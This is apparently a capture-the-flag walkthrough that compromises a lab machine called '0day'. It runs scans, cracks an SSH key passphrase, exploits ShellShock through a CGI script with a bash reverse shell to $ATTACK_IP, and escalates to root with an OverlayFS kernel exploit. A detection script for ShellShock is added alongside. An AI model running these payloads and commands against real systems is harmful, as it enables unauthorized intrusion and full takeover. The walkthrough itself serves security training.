Nmap Results

# Nmap 7.94SVN scan initiated Sat Apr 13 01:37:04 2024 as: nmap -Pn -p- --min-rate 2000 -sC -sV -oN nmap-scan.txt
Nmap scan report for
Host is up (0.076s latency).
Not shown: 65533 closed tcp ports (reset)
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 57:20:82:3c:62:aa:8f:42:23:c0:b8:93:99:6f:49:9c (DSA)
|   2048 4c:40:db:32:64:0d:11:0c:ef:4f:b8:5b:73:9b:c7:6b (RSA)
|   256 f7:6f:78:d5:83:52:a6:4d:da:21:3c:55:47:b7:2d:6d (ECDSA)
|_  256 a5:b4:f0:84:b6:a7:8d:eb:0a:9d:3e:74:37:33:65:16 (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 0day
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at .
# Nmap done at Sat Apr 13 01:37:50 2024 -- 1 IP address (1 host up) scanned in 45.60 seconds

Service Enumeration


Gobuster Enumeration

Directory and File Enumeration

gobuster dir -u http://$target -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -x php,html,txt -o gobuster-80.txt
/admin                (Status: 301) [Size: 311] [-->]
/backup               (Status: 301) [Size: 312] [-->]
/cgi-bin              (Status: 301) [Size: 313] [-->]
/cgi-bin/             (Status: 403) [Size: 287]
/cgi-bin/.html        (Status: 403) [Size: 292]
/css                  (Status: 301) [Size: 309] [-->]
/img                  (Status: 301) [Size: 309] [-->]
/index.html           (Status: 200) [Size: 3025]
/js                   (Status: 301) [Size: 308] [-->]
/robots.txt           (Status: 200) [Size: 38]
/secret               (Status: 301) [Size: 312] [-->]
/server-status        (Status: 403) [Size: 292]
/uploads              (Status: 301) [Size: 313] [-->]


/backup/ contains a password-protected SSH private key; let's keep this handy for later.
curl -s -o ssh_key.pem
chmod 400 ssh_key.pem

Save the file locally

ssh2john ssh_key.pem > ssh_key_hash

Generate a hash to crack the SSH key password

john --wordlist=rockyou.txt ssh_key_hash

Crack the hash

Enumerating Some More

I do not yet have a username that I can pair with this SSH key, so we'll have to hunt around for additional subdirectories and files.

I enumerated /secret/, /uploads/, /backup/, and /admin/ with common file extensions based on what I thought would be in the directory. However, I didn't have any luck finding anything.

And even though the /cgi-bin/ directory is forbidden to us, it's a good idea to check here for any scripts that might be available. CGI scripts may take user input and parse it on the server, which could lead to remote code execution (RCE).

gobuster dir -u http://$target/cgi-bin -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 100 -x sh,py,rb,cgi -o gobuster-80_cgibin.txt
/test.cgi             (Status: 200) [Size: 13]


CGI | HackTricks

Searching Google for CGI exploits, this article comes up with some good ideas.

It looks like this CGI script is vulnerable to ShellShock.

HackTheBox | Shocker

I'll just use my POC from here.


The CGI script on the target is vulnerable to ShellShock: the web server passes HTTP header values to the CGI script as environment variables, and an unpatched bash that imports an environment variable beginning with a function definition ("() { ...; };") goes on to execute whatever commands follow the closing brace. The server administrator must update the underlying operating system (which brings in a patched bash) or disable the CGI script to resolve this issue.
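As an added defensive example (not part of the original writeup), the following Python flags the ShellShock function-definition prefix in request header values and in Apache combined-format access log lines, since Referer and User-Agent are logged by default while Cookie is not. The log lines below are constructed for the example, not taken from the target.

```python
import re
from typing import Dict, List

# Unpatched bash imported a function from any environment variable whose value
# began with "() {"; whatever followed the closing "}" ran as a command. Apache
# hands request headers to CGI scripts as HTTP_* variables, so the raw header
# value is where the prefix shows up.
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<trailer>\S.*)", re.S)

# Apache "combined" log format: Referer and User-Agent are the last two quoted
# fields; Apache escapes embedded quotes as \" so the field pattern allows them.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<ua>(?:[^"\\]|\\.)*)"$'
)


def find_shellshock(headers: Dict[str, str]) -> List[dict]:
    """Return one finding per header whose value carries a function-definition prefix."""
    findings = []
    for name, value in headers.items():
        m = SHELLSHOCK_RE.search(value)
        if m:
            findings.append({"header": name, "trailer": m.group("trailer").strip()})
    return findings


def scan_access_log(lines: List[str]) -> List[dict]:
    """Parse combined-format lines and report those whose logged headers match."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess at fields
        found = find_shellshock({"Referer": m["referer"], "User-Agent": m["ua"]})
        if found:
            hits.append({"ip": m["ip"], "request": m["req"],
                         "status": int(m["status"]), "findings": found})
    return hits


# Constructed sample lines: one probe against the CGI script found above (the
# trailer only echoes a marker), followed by an ordinary page view.
SAMPLE_LOG = [
    '203.0.113.5 - - [13/Apr/2024:01:45:10 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 200 13 '
    '"() { :;}; /bin/bash -c \'echo vulnerable\'" "() { :;}; /bin/bash -c \'echo vulnerable\'"',
    '198.51.100.7 - - [13/Apr/2024:01:45:12 +0000] "GET /index.html HTTP/1.1" 200 3025 '
    '"-" "Mozilla/5.0 (X11; Linux x86_64)"',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```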

Test command execution

Getting a shell on the machine should be as simple as changing the payload in the PWN variable from before.

PWN="() { :;}; /bin/bash -c '/bin/bash -i >& /dev/tcp/$ATTACK_IP/$ATTACK_PORT 0>&1 &'"

Change the payload

sudo rlwrap nc -lnvp 80

Start a listener on port 80

curl \
-H "User-Agent: $PWN" \
-H "Cookie: $PWN" \
-H "Referer: $PWN" -v

Run the payload against the target CGI script

Post-Exploit Enumeration

Operating Environment

OS & Kernel

VERSION="14.04.1 LTS, Trusty Tahr"
PRETTY_NAME="Ubuntu 14.04.1 LTS"

Linux ubuntu 3.13.0-32-generic #57-Ubuntu SMP Tue Jul 15 03:51:08 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

Current User

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Sorry, user www-data may not run sudo on ubuntu.

Users and Groups

Local Users

ryan:x:1000:1000:Ubuntu 14.04.1,,,:/home/ryan:/bin/bash

Local Groups


Network Configurations

Network Interfaces

2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc pfifo_fast state UP group default qlen 1000
    link/ether 02:8e:e4:9b:36:1f brd ff:ff:ff:ff:ff:ff
    inet brd scope global eth0
       valid_lft forever preferred_lft forever
    inet6 fe80::8e:e4ff:fe9b:361f/64 scope link
       valid_lft forever preferred_lft forever

Interesting Files


lrwxrwxrwx  1 root root   14 Sep  2  2020 .secret -> /root/root.txt

Privilege Escalation

After hunting around for a good bit, I didn't spot much in the way of misconfigurations or interesting files that might leak some data that could be used to pivot to another user. So, I decided to focus on the fact that this host operating system is very old.

This host may be vulnerable to the FUSE / OverlayFS privilege escalation.

The kernel version and operating system version of this host definitely line up with the comments in the exploit POC.

We can see that FUSE is installed on the target
'gcc' is also installed, so we can compile locally.
curl -o pwn.c
sudo python3 -m http.server 80

Download the exploit locally and host it

File downloaded locally
gcc is complaining that it can't find a dependency, but it is installed.

What are the Default $PATH Values?

I suspect this might be a PATH issue with the 'www-data' user.

export PATH='/usr/lib/lightdm/lightdm:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games'
Nice! No compilation errors!
We are root!
